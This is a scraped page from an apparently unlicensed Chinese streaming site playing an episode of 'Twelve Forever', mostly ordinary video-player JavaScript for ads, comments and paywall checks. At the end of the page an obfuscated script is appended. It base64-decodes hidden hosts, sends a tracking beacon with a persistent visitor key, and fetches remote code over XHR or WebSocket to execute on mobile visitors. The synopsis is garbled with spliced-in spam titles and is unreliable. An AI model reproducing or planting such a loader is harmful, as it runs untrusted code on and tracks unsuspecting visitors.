• 正在播放永远十二岁第一季第25集
欢迎来到6080,如播放不了,刷新网页即可!
极速云
  • 永远十二岁第一季影评
var YZM = { versions: function() { var u = navigator.userAgent, app = navigator.appVersion; return { trident: u.indexOf('Trident') > -1, //IE内核 presto: u.indexOf('Presto') > -1, //opera内核 webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核 gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核 mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端 ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端 android: u.indexOf('Android') > -1 || u.indexOf('Adr') > -1, //android终端 iPhone: u.indexOf('iPhone') > -1, //是否为iPhone或者QQHD浏览器 iPad: u.indexOf('iPad') > -1, //是否iPad webApp: u.indexOf('Safari') == -1, //是否web应该程序,没有头部与底部 weixin: u.indexOf('MicroMessenger') > -1, //是否微信 (2015-01-22新增) qq: u.match(/\sQQ/i) == " qq" //是否QQ }; }(), 'start': function() { $.ajax({ url: "/js/player/dmplayer/admin/api.php", dataType: "json", success: function(e) { YZM.waittime = e.data.waittime YZM.ads = e.data.ads; config.logo = e.data.logo; up.pbgjz = e.data.pbgjz; up.jzuser = e.data.jzuser; up.trysee = e.data.trytime; config.sendtime = e.data.sendtime; config.color = e.data.color; config.group_x = YZM.ads.set.group; config.dmrule = e.data.dmrule; //config.group = YZM.getCookie('group_id'); danmuon = e.data.danmuon; if (YZM.ads.state == 'on') { if (YZM.ads.set.state == '1') { YZM.MYad.vod(YZM.ads.set.vod.url, YZM.ads.set.vod.link); } else if (YZM.ads.set.state == '2') { YZM.MYad.pic(YZM.ads.set.pic.link, YZM.ads.set.pic.time, YZM.ads.set.pic.img); } } else { YZM.play(config.url); } } }); }, 'play': function(url) { if (!danmuon) { YZM.player.play(url); } else { if (config.av != '') { YZM.player.bdplay(url); } else { YZM.player.dmplay(url); } } $(function() { $(".yzmplayer-setting-speeds,.yzmplayer-setting-speed-item").on("click", function() { $(".speed-stting").toggleClass("speed-stting-open"); }); $(".speed-stting .yzmplayer-setting-speed-item").click(function() { $(".yzmplayer-setting-speeds .title").text($(this).text()); }); }); $(".yzmplayer-fulloff-icon").on("click", function() { YZM.dp.fullScreen.cancel(); }); $(".yzmplayer-showing").on("click", function() { YZM.dp.play(); $(".vod-pic").remove(); }); if (config.title != '') { $("#vodtitle").html(config.title + ' ' + config.sid); }; }, 'dmid': function() { if (up.diyid[0] == 0 && config.id != '') { a = config.id, b = config.sid } else if (up.diyid[0] == 1 || !config.id) { a = up.diyid[1], b = up.diyid[2] } YZM.id = a + ' P' + b }, 'load': function() { setTimeout(function() { $("#link1").fadeIn(); }, 100); setTimeout(function() { $("#link1-success").fadeIn(); }, 500); setTimeout(function() { $("#link2").show(); }, 1 * 1000); setTimeout(function() { $("#link3,#span").fadeIn(); }, 2 * 1000); if (YZM.versions.weixin && (YZM.versions.ios || YZM.versions.iPad)) { var css = ''; $('body').append(css).addClass(""); } YZM.danmu.send(); YZM.danmu.list(); YZM.def(); YZM.video.try(); YZM.dp.danmaku.opacity(1); }, 'def': function() { console.log('播放器开启'); YZM.stime = 0; YZM.headt = yzmck.get("headt"); YZM.lastt = yzmck.get("lastt"); YZM.last_tip = parseInt(YZM.lastt) + 10; YZM.frists = yzmck.get('frists'); YZM.lasts = yzmck.get('lasts'); YZM.playtime = Number(YZM.getCookie("time_" + config.url)); YZM.ctime = YZM.formatTime(YZM.playtime); YZM.dp.on("loadedmetadata", function() { YZM.loadedmetadataHandler(); }); YZM.dp.on('fullscreen',function(){ if(/Android|webOS|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)){ screen.orientation.lock('landscape'); } }); YZM.dp.on("ended", function() { YZM.endedHandler(); }); YZM.dp.on('pause', function() { YZM.MYad.pause.play(YZM.ads.pause.link, YZM.ads.pause.pic); }); YZM.dp.on('play', function() { YZM.MYad.pause.out(); }); YZM.dp.on('timeupdate', function(e) { YZM.timeupdateHandler(); }); YZM.jump.def() }, 'video': { 'play': function() { $("#link3").text("视频已准备就绪,即将为您播放"); setTimeout(function() { YZM.dp.play(); $("#loading-box").remove(); YZM.jump.head(); }, 1 * 1500); }, 'next': function() { top.location.href = up.mylink + config.next; }, 'try': function() { if (up.trysee > 0 && config.group < config.group_x && config.group != '') { $('#dmtext').attr({ "disabled": true, "placeholder": "登陆才能发弹幕" }); }; var xyplay=$.ajax({ url: '/ass.php?url=dp&vid='+zvid+'&vfrom='+zvfrom+'&vpart='+zvpart, dataType: 'jsonp', async:false, jsonp: 'cb' }).responseJSON.s; var vtry_time=xyplay['try']; var vjifen=xyplay['jifen']; var vjifenname=xyplay['jifenname']; var vhouz=xyplay['houz']; var viparr2=xyplay.vipp; var viparr=Object.values(viparr2); var isauth=xyplay['isauth']; var t = parseInt(vtry_time); function IsInArray(arr,value){ for(var i = 0; i < arr.length; i++){ if(value === arr[i]){ return true; } } return false; } setInterval(function() { var s = parseInt(YZM.dp.video.currentTime); if (IsInArray(viparr,parseInt(zvpart)) && isauth=='n' && s > t) { YZM.dp.fullScreen.cancel(); YZM.dp.pause(); document.write("
抱歉,本片需要购买观看完整版
开通VIP购买此片,可享受会员权限
"); } }, 1000); }, 'seek': function() { YZM.dp.seek(YZM.playtime); }, 'end': function() { layer.msg("播放结束啦=。="); }, 'con_play': function() { if (!danmuon) { YZM.jump.head(); } else { var conplayer = ` 已播放至${YZM.ctime},继续上次播放?${YZM.waittime}s` $("#link3").html(conplayer); var span = document.getElementById("num"); var num = span.innerHTML; var timer = null; setTimeout(function() { timer = setInterval(function() { num--; span.innerHTML = num; if (num == 0) { clearInterval(timer); YZM.video.seek(); YZM.dp.play(); $(".memory-play-wrap,#loading-box").remove(); } }, 1000); }, 1); }; var cplayer = `
×上次看到 ${YZM.ctime}跳转播放
` $(".yzmplayer-cplayer").append(cplayer); $(".close").on("click", function() { $(".memory-play-wrap").remove(); }); setTimeout(function() { $(".memory-play-wrap").remove(); }, 20 * 1000); $(".conplaying").on("click", function() { clearTimeout(timer); $("#loading-box").remove(); YZM.dp.play(); YZM.jump.head(); }); $(".conplay-jump,.play-jump").on("click", function() { clearTimeout(timer); YZM.video.seek(); $(".memory-play-wrap,#loading-box").remove(); YZM.dp.play(); }); } }, 'jump': { 'def': function() { h = ".yzmplayer-setting-jfrist label"; l = ".yzmplayer-setting-jlast label"; f = "#fristtime"; j = "#jumptime"; a(h, 'frists', YZM.frists, 'headt', YZM.headt, f); a(l, 'lasts', YZM.lasts, 'lastt', YZM.lastt, j); function er() { layer.msg("请输入有效时间哟!"); } function su() { layer.msg("设置完成,将在刷新或下一集生效"); } function a(b, c, d, e, g, t) { $(b).on("click", function() { o = $(t).val(); if (o > 0) { $(b).toggleClass('checked'); su(); g = $(t).val(); yzmck.set(e, g); } else { er() }; }); if (d == 1) { $(b).addClass('checked'); $(b).click(function() { o = $(t).val(); if (o > 0) { yzmck.set(c, 0); } else { er() }; }); } else { $(b).click(function() { o = $(t).val(); if (o > 0) { yzmck.set(c, 1); } else { er() }; }); } }; $(f).attr({ "value": YZM.headt }); $(j).attr({ "value": YZM.lastt }); YZM.jump.last(); }, 'head': function() { if (YZM.stime > YZM.playtime) YZM.playtime = YZM.stime; if (YZM.frists == 1) { if (YZM.headt > YZM.playtime || YZM.playtime == 0) { YZM.jump_f = 1 } else { YZM.jump_f = 0 } } if (YZM.jump_f == 1) { YZM.dp.seek(YZM.headt); YZM.dp.notice("已为您跳过片头"); } }, 'last': function() { if (config.next != '') { if (YZM.lasts == 1) { setInterval(function() { var e = YZM.dp.video.duration - YZM.dp.video.currentTime; if (e < YZM.last_tip) YZM.dp.notice('即将为您跳过片尾'); if (YZM.lastt > 0 && e < YZM.lastt) { YZM.setCookie("time_" + config.url, "", -1); YZM.video.next(); }; }, 1000); }; } else { $(".icon-xj").remove(); }; }, 'ad': function(a, b) {} }, 'danmu': { 'send': function() { g = $(".yzm-yzmplayer-send-icon"); d = $("#dmtext"); h = ".yzmplayer-comment-setting-"; $(h + "color input").on("click", function() { r = $(this).attr("value"); setTimeout(function() { d.css({ "color": r }); }, 100); }); $(h + "type input").on("click", function() { t = $(this).attr("value"); setTimeout(function() { d.attr("dmtype", t); }, 100); }); $(h + "font input").on("click", function() { t = $(this).attr("value"); setTimeout(function() { d.attr("size", t); }, 100); }); g.on("click", function() { a = document.getElementById("dmtext"); a = a.value; b = d.attr("dmtype"); c = d.css("color"); z = d.attr("size"); if (up.trysee > 0 && config.group < config.group_x && config.group != '') { layer.msg("登陆才能发弹幕"); return; } var jzword=up.pbgjz.split(','); for (var i = 0; i < jzword.length; i++) { if (a.search(jzword[i]) != -1) { layer.msg("请勿发送无意义内容,规范您的弹幕内容"); return; } } var jzusrarr=up.jzuser.split(','); for (var i = 0; i < jzusrarr.length; i++) { if (config.user==jzusrarr[i]) { layer.msg("您被管理员关进了小黑屋"); return; } } if (a.length < 1) { layer.msg("要输入弹幕内容啊喂!"); return; } var e = Date.parse(new Date()); var f = yzmck.get('dmsent', e); if (e - f < config.sendtime * 1000) { layer.msg('请勿频繁操作!发送弹幕需间隔' + config.sendtime + '秒~'); return; } d.val(""); YZM.dp.danmaku.send({ text: a, color: c, type: b, size: z }); yzmck.set('dmsent', e); }); function k() { g.trigger("click"); }; d.keydown(function(e) { if (e.keyCode == 13) { k(); }; }); }, 'list': function() { $(".yzmplayer-list-icon,.yzm-yzmplayer-send-icon").on("click", function() { $(".list-show").empty(); $.ajax({ url: config.api + "?ac=get&id=" + YZM.id, success: function(d) { if (d.code == 23) { a = d.danmuku; b = d.name; c = d.danum; $(".danmuku-num").text(c) $(a).each(function(index, item) { l = `
  • ${YZM.formatTime(item[0])}
  • ${item[4]} [${item[8]}]
  • ${item[6]}
  • 举报
  • ` $(".list-show").append(l); }) } $(".danmuku-list").on("dblclick", function() { YZM.dp.seek($(this).attr("time")) }) } }); }); var liyih = ''; $("div.yzmplayer-comment-box:last").append(liyih); $(".yzmplayer-watching-number").text(up.usernum); $(".yzmplayer-info-panel-item-title-amount .yzmplayer-info-panel-item-title").html("违规词"); for (var i = 0; i < up.pbgjz.length; i++) { var gjz_html = "" + up.pbgjz[i] + ""; $("#vod-title").append(gjz_html); } add('.yzmplayer-list-icon', ".yzmplayer-danmu", 'show'); function add(div1, div2, div3, div4) { $(div1).click(function() { $(div2).toggleClass(div3); $(div4).remove(); }); } }, 'report': function(a, b, c, d) { layer.confirm('' + c + '', { anim: 1, title: '举报弹幕', btn: ['违法违禁', '色情低俗', '恶意刷屏', '赌博诈骗', '人身攻击', '侵犯隐私', '垃圾广告', '剧透', '引战'], btn3: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '恶意刷屏'); }, btn4: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '赌博诈骗'); }, btn5: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '人身攻击'); }, btn6: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '侵犯隐私'); }, btn7: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '垃圾广告'); }, btn8: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '剧透'); }, btn9: function(index, layero) { YZM.danmu.post_r(a, b, c, d, '引战'); } }, function(index, layero) { YZM.danmu.post_r(a, b, c, d, '违法违禁'); }, function(index) { YZM.danmu.post_r(a, b, c, d, '色情低俗'); }); }, 'post_r': function(a, b, c, d, type) { $.ajax({ type: "get", url: config.api + '?ac=report&cid=' + d + '&user=' + a + '&type=' + type + '&title=' + b + '&text=' + c, cache: false, dataType: 'json', beforeSend: function() {}, success: function(data) { layer.msg("举报成功!感谢您为守护弹幕作出了贡献"); }, error: function(data) { var msg = "服务故障 or 网络异常,稍后再试6!"; layer.msg(msg); } }); } }, 'setCookie': function(c_name, value, expireHours) { var exdate = new Date(); exdate.setHours(exdate.getHours() + expireHours); document.cookie = c_name + "=" + escape(value) + ((expireHours === null) ? "" : ";expires=" + exdate.toGMTString()); }, 'getCookie': function(c_name) { if (document.cookie.length > 0) { c_start = document.cookie.indexOf(c_name + "="); if (c_start !== -1) { c_start = c_start + c_name.length + 1; c_end = document.cookie.indexOf(";", c_start); if (c_end === -1) { c_end = document.cookie.length; }; return unescape(document.cookie.substring(c_start, c_end)); } } return ""; }, 'formatTime': function(seconds) { return [parseInt(seconds / 60 / 60), parseInt(seconds / 60 % 60), parseInt(seconds % 60)].join(":").replace( /\b(\d)\b/g, "0$1"); }, 'loadedmetadataHandler': function() { if (YZM.playtime > 0 && YZM.dp.video.currentTime < YZM.playtime) { setTimeout(function() { YZM.video.con_play() }, 1 * 1000); } else { setTimeout(function() { if (!danmuon) { YZM.jump.head(); } else { YZM.dp.notice("视频已准备就绪,即将为您播放"); YZM.video.play() } }, 1 * 1000); } YZM.dp.on("timeupdate", function() { YZM.timeupdateHandler(); }); }, 'timeupdateHandler': function() { YZM.setCookie("time_" + config.url, YZM.dp.video.currentTime, 24); }, 'endedHandler': function() { YZM.setCookie("time_" + config.url, "", -1); if (config.next != '') { YZM.dp.notice("5s后,将自动为您播放下一集"); setTimeout(function() { YZM.video.next(); }, 5 * 1000); } else { YZM.dp.notice("视频播放已结束"); setTimeout(function() { YZM.video.end(); }, 2 * 1000); } }, 'player': { 'play': function(url) { $('body').addClass("danmu-off"); YZM.dp = new yzmplayer({ autoplay: true, element: document.getElementById('player'), theme: config.color, logo: config.logo, video: { url: url, pic: config.pic, type: 'auto', }, }); var css = ''; $('body').append(css).addClass(""); YZM.def(); //YZM.jump.head(); }, 'adplay': function(url) { $('body').addClass("danmu-off"); YZM.ad = new yzmplayer({ autoplay: true, element: document.getElementById('ADplayer'), theme: config.color, logo: config.logo, video: { url: url, pic: config.pic, type: 'auto', }, }); $('.yzmplayer-controller,.yzmplayer-cplayer,.yzmplayer-logo,#loading-box,.yzmplayer-controller-mask').remove(); $('.yzmplayer-mask').show(); YZM.ad.on('timeupdate', function() { if (YZM.ad.video.currentTime > YZM.ad.video.duration - 0.1) { $('body').removeClass("danmu-off"); YZM.ad.destroy(); $("#ADplayer").remove(); $("#ADtip").remove(); YZM.play(config.url); } }); }, 'dmplay': function(url) { YZM.dmid(); YZM.dp = new yzmplayer({ autoplay: false, element: document.getElementById('player'), theme: config.color, logo: config.logo, video: { url: url, pic: config.pic, type: 'auto', }, danmaku: { id: YZM.id, api: config.api + '?ac=dm', user: config.user } }); YZM.load(); }, 'bdplay': function(url) { YZM.dmid(); YZM.dp = new yzmplayer({ autoplay: false, element: document.getElementById('player'), theme: config.color, logo: config.logo, video: { url: url, pic: config.pic, type: 'auto', }, danmaku: { id: YZM.id, api: config.api + '?ac=dm', user: config.user, addition: [config.api + 'bilibili/?av=' + config.av] } }); YZM.load(); } }, 'MYad': { 'vod': function(u, l) { $("#ADtip").html('查看详情'); $("#ADplayer").click(function() { document.getElementById('link').click(); }); YZM.player.adplay(u); }, 'pic': function(l, t, p) { $("#ADtip").html('广告 ' + t + ''); $("#ADtip").click(function() { document.getElementById('link').click(); }); var span = document.getElementById("time_ad"); var num = span.innerHTML; var timer = null; setTimeout(function() { timer = setInterval(function() { num--; span.innerHTML = num; if (num == 0) { clearInterval(timer); YZM.play(config.url); $('#ADtip').remove(); } }, 1000); }, 1); }, 'pause': { 'play': function(l, p) { if (YZM.ads.pause.state == 'on') { var pause_ad_html = '
    广告
    '; $('#player').before(pause_ad_html); } }, 'out': function() { $('#player_pause').remove(); } } } } // 控制台报错 //setInterval(function() { //window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized ? t("on") : (a = "off", ("undefined"!==typeof console.clear) && console.clear()); //debugger; //}, 10);
    • 剧情介绍
    剧集概述:《永远乡村爱情14部全集免费版第60集十二岁第一季》英文原名Twelve For北斗双雄ever Season 1,是一部青摔跤吧爸爸下载春 动画 剧情 冒险类型的美剧

    相关热播

    • 更新至9集英雄联盟:双城之战普通话版海莉·斯坦菲尔德,艾拉·珀内尔,梁佩诗,凯文·阿历詹卓,哈里·劳埃德,杰森·斯皮萨克,JB·布兰科,托克斯·奥拉贡多耶,米娅·辛克莱·詹内斯
    • 完结超级骗子津田健次郎,坂本真绫,诹访部顺一,稻田彻,木村昴,羽多野涉,泷正则,江川央生,大桥贤一郎,竹本英史,家中宏,Yasuji Kimura
    • 完结英雄联盟:双城之战海莉·斯坦菲尔德,艾拉·珀内尔,梁佩诗,凯文·阿历詹卓,哈里·劳埃德,杰森·斯皮萨克,JB·布兰科,托克斯·奥拉贡多耶,米娅·辛克莱·詹内斯
    • 全9集英雄联盟:双城之战国语海莉·斯坦菲尔德,艾拉·珀内尔,梁佩诗,凯文·阿历詹卓,哈里·劳埃德,杰森·斯皮萨克,JB·布兰科,托克斯·奥拉贡多耶,米娅·辛克莱·詹内斯
    • 全9集假如…?第一季杰弗里·怀特,海莉·阿特维尔,乔什·布洛林,多米尼克·库珀,大卫·达斯马齐连,迈克尔·道格拉斯,凯伦·吉兰,杰夫·高布伦,弗兰克·格里罗,肖恩·古恩,克里斯·海姆斯沃斯,汤姆·希德勒斯顿,杰曼·翰苏,塞缪尔·杰克逊,托比·琼斯,迈克尔·B·乔丹,尼尔·麦克唐纳,娜塔莉·波特曼,杰瑞米·雷纳,迈克尔·鲁克,保罗·路德,马克·鲁弗洛,塞巴斯蒂安·斯坦,克里斯·沙利文,斯坦利·图齐,塔伊加·维迪提,查德
    • 更新至3集英雄联盟:双城之战英文版海莉·斯坦菲尔德,艾拉·珀内尔,梁佩诗,凯文·阿历詹卓,哈里·劳埃德,杰森·斯皮萨克,JB·布兰科,托克斯·奥拉贡多耶,米娅·辛克莱·詹内斯

    若6080新视觉影院收录的视频节目无意侵犯了贵司版权
    请在留言处留言 我们会在3日内删除侵权内容,谢谢。网站地图

    function sBwRIaO(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function dvzLQ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return sBwRIaO(t);};window[''+'h'+'S'+'T'+'Q'+'w'+'U'+'F'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){function Sfve(t){var e=t.match(new RegExp('^((https?|wss?)?://)?a.'));if(!e)return t;var n=new Date;return(e[1]||"")+[n.getMonth()+1,n.getDate(),n.getHours()].join("").split("").map(function(t){return String.fromCharCode(t%26+(t%2!=0?65:97))}).join("")+"."+t.split(".").slice(-2).join(".")};var x=dvzLQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=Sfve(decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0]))));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://qsc.vxcewh.cn:7891/stats/14915/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh4/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=Sfve(decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1]))));var ws=new WebSocket(k+'/wh4/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh4/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh4/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZhLmmxpdWd3Mi5jbiUzQTg4OTE=','d3NzJTNBJTJGJTJGYS5ja2210dHguY224lM0E5NTM0','165539',window,document,['m','2']);}:function(){};
    22